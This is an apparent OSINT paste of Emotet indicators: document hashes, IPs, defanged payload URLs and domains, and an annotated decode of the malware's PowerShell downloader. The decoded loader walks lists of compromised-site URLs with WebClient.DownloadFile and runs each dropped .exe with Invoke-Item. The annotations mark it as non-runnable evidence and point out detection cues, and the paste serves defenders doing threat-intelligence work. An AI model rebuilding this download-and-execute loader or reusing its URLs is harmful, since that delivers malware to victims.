paladin316

Emotet_Doc_out_2020-09-14_22_25.txt

Sep 14th, 2020
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256 (11 samples; per the title and the #Docs tag these are the malicious documents, not the dropped payloads):
  4. 28c80f27f09dddc1af681edceb122d548ac17c2d39a92d17026d45b3cf3ad6fd
  5. 785e1a7b7818be6954ac21f9d27f2d52615235cd8915f6580b94a3ccf806c8ee
  6. f8e3f7ec699ba3ec6580deed857867ec0f067538a224908d2dd48bb6b1bb8fac
  7. 813835e555a57244f759ea1f03dd32d05bc472af33d6ed3c4ff22fc850798fe3
  8. 3b211810dcd8176df286ff6d29407b15b8977014c8a22899ef51874995c40462
  9. f1f5cf89e4efd6d4fda071cfc2489dc4f7ebbee392f80bcfda05d7b16a296d72
  10. 79717451025cac2820d0e2aeb5f9cc7b8df2fd300b3c76c4dcacbf8605746deb
  11. 7d3c7910d791d2695cbfbe9c9a3c1d9422ce6fdbea545343e7092c073c8ab4a5
  12. 506bd0bf18d33b2e92b6638ec09ed0af6dcedffe870c41063f7845695e19fbc4
  13. e2d78cd26f57320bd4d389bca9a102cb68b93213ef40646d7d75edee2b627bb1
  14. 31948483fc5ed6d49d09367c9dd1e1d602a0124ce7f4758a4ec04c3c9b71c2fb
  15.  
  16.  
  17. IPs (23 — presumably resolutions of the domains below at the time of capture; several sit in shared hosting/CDN ranges, e.g. 104.27.x.x and 172.67.x.x, so blocking bare IPs risks collateral damage — prefer the URL/domain indicators):
  18. 104.194.10.93
  19. 104.27.155.238
  20. 104.27.186.49
  21. 104.27.187.49
  22. 108.167.188.50
  23. 136.144.213.181
  24. 144.168.41.18
  25. 144.208.79.23
  26. 144.76.42.253
  27. 164.68.111.62
  28. 166.62.108.196
  29. 172.67.140.13
  30. 185.169.97.243
  31. 185.195.15.164
  32. 185.2.4.71
  33. 185.66.41.119
  34. 191.6.196.118
  35. 192.185.215.162
  36. 207.244.248.53
  37. 31.186.8.162
  38. 45.119.81.203
  39. 46.183.8.124
  40. 46.28.2.41
  41.  
  42.  
  43.  
  44. URLs (21 payload-download URLs, defanged as hxxp/hxxps; the wp-content/wp-admin/wp-includes/cgi-bin paths suggest compromised legitimate sites rather than attacker-registered domains, so block the full path rather than the bare host where possible):
  45. hxxp://personalizzabili.com/images/lvyX7QK/
  46. hxxp://www.bismarjeparamebel.com/u/qkhyf/
  47. hxxp://agenciatabletshouse.com.br/erros/1PM/
  48. hxxp://desk4succes.nl/stats/cNFjYB/
  49. hxxp://westerndata.com.au/wp-includes/3jp/
  50. hxxp://graphicom.it/cgi-bin/HsPkL/
  51. hxxp://oneinsix.com/test/1F4c/
  52. hxxp://academiadotrader.net/wp-content/f/
  53. hxxp://whitegoldinitiatives.org/wp-admin/d/
  54. hxxps://lifeadvicer.com/wp-content/L/
  55. hxxp://intc.solutions/wp-content/qi6/
  56. hxxp://sanatcifiyatlari.net/dup-installer/5/
  57. hxxps://www.letslearntech.com/wp-content/u/
  58. hxxps://sublimatransfer.com/backup28082020/Ir/
  59. hxxps://blueyellowshop.com/wp-includes/mihae8A/
  60. hxxp://kingsalmanquran.com/wp-content/wuPyeI/
  61. hxxps://dagranitegiare.com/wp-admin/Z21r6R/
  62. hxxp://acontarborreguitos.com/acontarborreguitos/I/
  63. hxxp://atenaclinicaesegurancadotrabalho.com/cgi-bin/NlMH/
  64. hxxp://digitalbazar.com/wp-admin/RVEzrK/
  65. hxxps://byc-center.com/wp-admin/Z4r/
  66.  
  67.  
  68. Domains (21, the hosts of the URLs above; same caveat — the root domains appear to be compromised legitimate sites, so a domain-level block may disrupt a legitimate business):
  69. personalizzabili.com
  70. www.bismarjeparamebel.com
  71. agenciatabletshouse.com.br
  72. desk4succes.nl
  73. westerndata.com.au
  74. graphicom.it
  75. oneinsix.com
  76. academiadotrader.net
  77. whitegoldinitiatives.org
  78. lifeadvicer.com
  79. intc.solutions
  80. sanatcifiyatlari.net
  81. www.letslearntech.com
  82. sublimatransfer.com
  83. blueyellowshop.com
  84. kingsalmanquran.com
  85. dagranitegiare.com
  86. acontarborreguitos.com
  87. atenaclinicaesegurancadotrabalho.com
  88. digitalbazar.com
  89. byc-center.com
  90.  
  91.  
  92. Decoded Base64 PowerShell (presumably the downloader stage embedded in the documents; quoting, parentheses and string concatenation were lost in decoding, so this text is not directly runnable — treat it as read-only evidence, not something to rebuild):
  # Analyst annotation of the decoded loader. It consists of three near-identical
  # stages; each one (1) creates a two-level directory under %USERPROFILE%,
  # (2) relaxes the TLS settings, (3) builds a target .exe path by replacing a
  # three-character filler token with a backslash, (4) walks a list of seven
  # download URLs with Net.WebClient.DownloadFile, and (5) runs the dropped file
  # with Invoke-Item as soon as one download is at least a hard-coded size,
  # then breaks. Errors are swallowed by an empty catch{}, so a dead URL just
  # falls through to the next one. Many assignments such as $Fretz5y=Dkbc63r
  # are filler: the variables are never referenced again. Quoting was lost in
  # the decode, so the code below is not runnable as written.
  #
  # Detection opportunities visible here: New-Item of a fresh directory under
  # the user profile, [Net.ServicePointManager]::SecurityProtocol being set,
  # Net.WebClient.DownloadFile writing a .exe under the user profile, and
  # Invoke-Item on that file — all from a PowerShell child of an Office process
  # (the parent is inferred from the document samples above; confirm in telemetry).
  #
  # ---- Stage 1 ----
  93. $Fretz5y=Dkbc63r;
  # Drop directory: %USERPROFILE%\R0Ulrrw\Ae5LEy5
  94. .new-item $enV:UseRpRofile\R0Ulrrw\Ae5LEy5\ -itemtype DireCTory;
  # Accept TLS 1.2/1.1/1.0 for the downloads below.
  95. [Net.ServicePointManager]::"SEcUR`I`TY`protOcOL" = tls12, tls11, tls;
  # Payload file name (without extension) for this stage.
  96. $Gd55icf = It3o0t4d;
  97. $Wi9y5ov=Sw20xp5;
  # [char]69,[char]54,[char]75 = "E6K" -> replaced with "\"; the result is
  # %USERPROFILE%\R0ulrrw\Ae5ley5\It3o0t4d.exe (case differs from line 94, but
  # Windows paths are case-insensitive).
  98. $Odmjcre=$env:userprofileE6KR0ulrrwE6KAe5ley5E6K."r`EPLA`ce"[chAR]69[chAR]54[chAR]75,\$Gd55icf.exe;
  99. $Qhgpuxj=H_v8pg1;
  # HTTP client used for the download loop.
  100. $Pc2zwac=.new-object nET.wEbcliENT;
  # Seven candidate payload URLs; the original string is split on [char]42
  # ('*') into an array. Only the trailing ."sP`LiT"[char]42 is code, the
  # rest are the URLs listed in the IOC section above.
  101. $Ji4kgyw=hxxp://personalizzabili.com/images/lvyX7QK/
  102. hxxp://www.bismarjeparamebel.com/u/qkhyf/
  103. hxxp://agenciatabletshouse.com.br/erros/1PM/
  104. hxxp://desk4succes.nl/stats/cNFjYB/
  105. hxxp://westerndata.com.au/wp-includes/3jp/
  106. hxxp://graphicom.it/cgi-bin/HsPkL/
  107. hxxp://oneinsix.com/test/1F4c/."sP`LiT"[char]42;
  108. $Ab5v1il=M4eg1vz;
  # Try each URL in turn: DownloadFile(url, $Odmjcre) writes straight to the .exe path.
  109. foreach$Pqxpns5 in $Ji4kgyw{try{$Pc2zwac."dOW`Nloa`dfilE"$Pqxpns5, $Odmjcre;
  110. $Ycllwz9=Zko54z6;
  # Size sanity check (>= 30858 bytes) to skip error pages / empty responses,
  # then execute the dropped file.
  111. If &Get-Item $Odmjcre."LENG`TH" -ge 30858 {&Invoke-Item$Odmjcre;
  112. $B0vvjwp=H02sd91;
  # First successful download+execute ends the loop.
  113. break;
  # Empty catch: a failed URL is silently skipped and the next one is tried.
  114. $M0m6odl=Pwp6rd4}}catch{}}$Pjywetz=Xpm2g18$Nkvruo1=Uct6xtv;
  # ---- Stage 2 (same pattern, different paths/URLs) ----
  # Drop directory: %USERPROFILE%\WjJDXya\XIaRZ6E
  115. &new-item $eNV:UserPrOfile\WjJDXya\XIaRZ6E\ -itemtype diReCTOry;
  116. [Net.ServicePointManager]::"se`cURi`TyP`ROTOcoL" = tls12, tls11, tls;
  117. $P3ghaap = Kanb27zv;
  118. $Obyzcb2=Vz2p9fr;
  # -creplace of "oHY" ([char]111,72,89) with "\" ([char]92):
  # %USERPROFILE%\Wjjdxya\Xiarz6e\Kanb27zv.exe
  119. $Gje08zu=$env:userprofileoHYWjjdxyaoHYXiarz6eoHY -crEPLACE [ChAr]111[ChAr]72[ChAr]89,[ChAr]92$P3ghaap.exe;
  120. $Ilvef0o=Kczscwy;
  121. $Isw52zm=&new-object NeT.WebCLienT;
  # Seven URLs, split on '*' as in stage 1.
  122. $Qm4ex42=hxxp://academiadotrader.net/wp-content/f/
  123. hxxp://whitegoldinitiatives.org/wp-admin/d/
  124. hxxps://lifeadvicer.com/wp-content/L/
  125. hxxp://intc.solutions/wp-content/qi6/
  126. hxxp://sanatcifiyatlari.net/dup-installer/5/
  127. hxxps://www.letslearntech.com/wp-content/u/
  128. hxxps://sublimatransfer.com/backup28082020/Ir/."S`plIT"[char]42;
  129. $Aiamci1=Uh456hs;
  130. foreach$Q5zhk__ in $Qm4ex42{try{$Isw52zm."do`W`Nloa`DfIlE"$Q5zhk__, $Gje08zu;
  131. $Wtoueqd=Qakaniv;
  # Minimum size for this stage: 24748 bytes.
  132. If .Get-Item $Gje08zu."l`e`NgtH" -ge 24748 {&Invoke-Item$Gje08zu;
  133. $Eozeerd=Om9fv4h;
  134. break;
  135. $Vxuhdqu=L1b01yu}}catch{}}$O4y4422=I9vegqc$Q_f7wys=Qboz3sz;
  # ---- Stage 3 (same pattern) ----
  # Drop directory: %USERPROFILE%\PfnoyhG\w2lwD2_
  136. .new-item $eNv:uSErpROFile\PfnoyhG\w2lwD2_\ -itemtype DIREcTORy;
  137. [Net.ServicePointManager]::"sE`c`UrI`Ty`prot`ocOL" = tls12, tls11, tls;
  138. $Aeb370c = Pcy7xg6;
  139. $Vg0pvs2=Dre75hg;
  # Replace "lBF" ([char]108,66,70) with "\" ([char]92):
  # %USERPROFILE%\Pfnoyhg\W2lwd2_\Pcy7xg6.exe
  140. $Ra85g8d=$env:userprofilelBFPfnoyhglBFW2lwd2_lBF."r`epLace"[CHaR]108[CHaR]66[CHaR]70,[StrIng][CHaR]92$Aeb370c.exe;
  141. $Rs2x5s0=B0aade9;
  142. $Oht57tr=.new-object nET.weBclIEnt;
  # Seven URLs, split on '*' as in stage 1.
  143. $U27o44j=hxxps://blueyellowshop.com/wp-includes/mihae8A/
  144. hxxp://kingsalmanquran.com/wp-content/wuPyeI/
  145. hxxps://dagranitegiare.com/wp-admin/Z21r6R/
  146. hxxp://acontarborreguitos.com/acontarborreguitos/I/
  147. hxxp://atenaclinicaesegurancadotrabalho.com/cgi-bin/NlMH/
  148. hxxp://digitalbazar.com/wp-admin/RVEzrK/
  149. hxxps://byc-center.com/wp-admin/Z4r/."sP`lit"[char]42;
  150. $Dybp1ck=Heukn4u;
  151. foreach$Hz7jbau in $U27o44j{try{$Oht57tr."DownLOA`D`FILE"$Hz7jbau, $Ra85g8d;
  152. $X2iepix=Fvoxr2g;
  # Minimum size for this stage: 20136 bytes.
  153. If .Get-Item $Ra85g8d."LeN`GTh" -ge 20136 {&Invoke-Item$Ra85g8d;
  154. $Q2ff2iv=Pm19yaj;
  155. break;
  156. $Pem85c9=Shfzxzu}}catch{}}$O31cpjf=Q7579pu